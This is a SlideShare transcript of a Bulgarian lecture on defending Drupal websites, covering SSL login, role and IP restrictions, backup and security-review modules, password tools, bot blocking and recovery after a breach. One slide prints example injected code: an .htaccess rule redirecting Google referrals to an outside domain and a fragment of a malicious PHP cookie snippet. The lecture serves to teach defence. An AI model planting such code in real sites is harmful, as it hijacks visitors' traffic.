Drupal security lecture

  • 1,986 views
Uploaded on

A short brief on Drupal security in Bulgarian.

A short brief on Drupal security in Bulgarian.

More in: Technology
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Be the first to comment
    Be the first to like this
No Downloads

Views

Total Views
1,986
On Slideshare
0
From Embeds
0
Number of Embeds
1

Actions

Shares
Downloads
3
Comments
0
Likes
0

Embeds 0

No embeds

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
    No notes for slide

Transcript

  • 1. СИГУРНОСТ В CMS DRUPAL Общи положения засигурност на Уеб сайтове София 10.02.2012 г. @init Lab
  • 2. Мета – за сигурността на Уеб сайтаСигурността на Уеб сайта е задължение на администратора; тя е основна част от изграждането на сайта; дадена информация не съществува, ако не е налична на три места. @init Lab
  • 3. Принципни положения при злонамерен достъп- изтриване на информация или подмяна настраница с друга и компрометиращо съдържание;- извличане на лични даннина потребителите в сайта;- пренасочване при достъпване от референтенсървър, към сайт с компрометиращо съдържание. @init Lab
  • 4. Примери-злонамерен код в .htaccessRewriteEngine OnRewriteCond%{HTTP_REFERER} .*google.* [OR]RewriteRule ^(.*)$http://peace-security.ru/mod/index.php [R=301,L]- злонамерен код в PHP файловеglobal $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11";if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo"<script>document.cookie=".$sessdt_k."=".$sessdt_f.";</script>";... @init Lab
  • 5. ПримериОбхождане на лош ботОпит за оторизиранена несъществуващпотребител @init Lab
  • 6. Основни методи за защита на информацията и сайта:- използване на криптирана връзка за оторизация(SSL логин);- оторизация на потребителски роли по IP адрес;- акуратни права на потребителите в системата;- рестрикции относно форматите за въвеждане;- защита на формуляра за оторизация;- следене дневника (log) за възможни проблеми;- вграждане на модул за архивиране на базатаданни и файловете на сайта;- обновяване на ядрото/модули на системата; @init Lab
  • 7. Основни методи за защита наинформацията и сайта - изисквания:- SSL (статичен ip адрес на хоста и генериране насертификат – собствен, от свободна институция,или от оторизиран източник). Инвестиция врамките на 24-50 лв на година със закупенсертификат. (http://cacert.org/ - собствен серт.)- статичен ip адрес за управление, влиза в пакетана някои Интернет достачици. Инвестиция врамките на 25-30 лв мес, обезпечава сигурноуправление на сайта. @init Lab
  • 8. Основни методи за защита на информацията и сайта - модули:- SSL чрез ръчно пренасочване на адрес към httpsили чрез модул http://drupal.org/project/session443- ограничаване на достъпа на роля по ip адресhttp://drupal.org/project/restrict_by_ip- създаване на периодичен архив на базата даннии файловете на сайта (ръчно/автоматизирано)http://drupal.org/project/backup_migrate* не можах да инициализирам FTP сесия, cronувисва при scheduled backup (за последния модул) @init Lab
  • 9. Проверка на сигурността на сайта модули- преглед на сигурността / действияhttp://drupal.org/project/security_review- определяне формати за въвежданеспоред ролята на потребителяhttp://drupal.org/project/better_formats- проверка състоянието на таблиците в базатаданни http://drupal.org/project/schema @init Lab
  • 10. Екран от модула Security Review @init Lab
  • 11. Защо паролата не е сигурен метод?- може да бъде открадната при използване нанекриптирана връзка;- сама по себе си не отговаря за самоличността навъвеждащия (приказката за Али Баба);- ако не е генерирана софтуерно е възможно дабъде с ниско ниво на сигурност (повтаряемост). @init Lab
  • 12. Помощни приложения- ползвайте генератор на паролиhttp://pwgen-win.sourceforge.net/- криптирайте важната информация - като паролиза достъп до сървъри, на вашия компютърhttp://www.truecrypt.org/- при размяна на важни пароли по електроннатапоща използвайте шифроване на данните.http://www.gnupg.org/ @init Lab
  • 13. Екран от приложението PW GenГенерирайтепаролитена своя компютър. @init Lab
  • 14. Добрите и лошите- ботове = X маркер на Вашата врата- злонамерени потребители = Касим (Али Баба)- пробиващият Системата = Шеф на крадцитеМетоди за защита – следене на лог записите,блокиране на недобросъвестните потребители/ботове (автоматизирано) по IP адрес, ограничаванедостъпа на лоши ботове чрез .htaccess файлаhttp://blog.superhosting.bg/good-vs-bad-bots.html @init Lab
  • 15. Да затворим вратата- ограничаване достъпа на ботове до сайта;http://en.linuxreviews.org/HOWTO_stop_automated_spam-bots_using_.htaccess- автоматизирано известяване за проблеми на сайта(модул http://drupal.org/project/logging_alerts) ;- блокиране на адреси при опит за brute force attackhttp://drupal.org/project/login_security; @init Lab
  • 16. Екран занастройкаот модулаLogin Security @init Lab
  • 17. При пробив в системата- ограничете достъпа до сайта само до себе си;- премахнете излишния софтуер от сървъра. - свържете се с хостинг компанията и проверетеза последния наличен архив;- влезте през задната врата (https:// до Вашия сървър)а не през парадния вход – Лошият е вътре;- сменете всички потребителски FTP и пароли иглавната за хост акаунта;- свалете базата данни и файловете на системата и гипрегледайте за злонамерен код – за OS Windows можеда ви послужи приложениетоhttp://code.google.com/p/dngrep/ @init Lab
  • 18. Защо сигурни сайтове?- обезпечавате Вашия труд и инвестицията наклиента;- предотвратявате възможността Интернетстраницата да се използва злонамерено от третилица;- правите Мрежата по-сигурно място за всички. @init Lab
  • 19. Допълнителна стойност на Вашия труд- можете да анализирате сайтове на клиенти занивото им на сигурност, срещу заплащане;- можете да имплементирате решения за сигурност;- можете да сключите договор за абонаментнаподдръжка, обновяване на системата и следене запроблеми в сигурността. @init Lab
  • 20. Все още начинаещпо въпросите за сигурността Георги Атанасов novsait@novsait.eu http://www.novsait.eu Работи с Друпал и пише теми за версия 6.0, имлементира SEO и Сигурност на системата @init Lab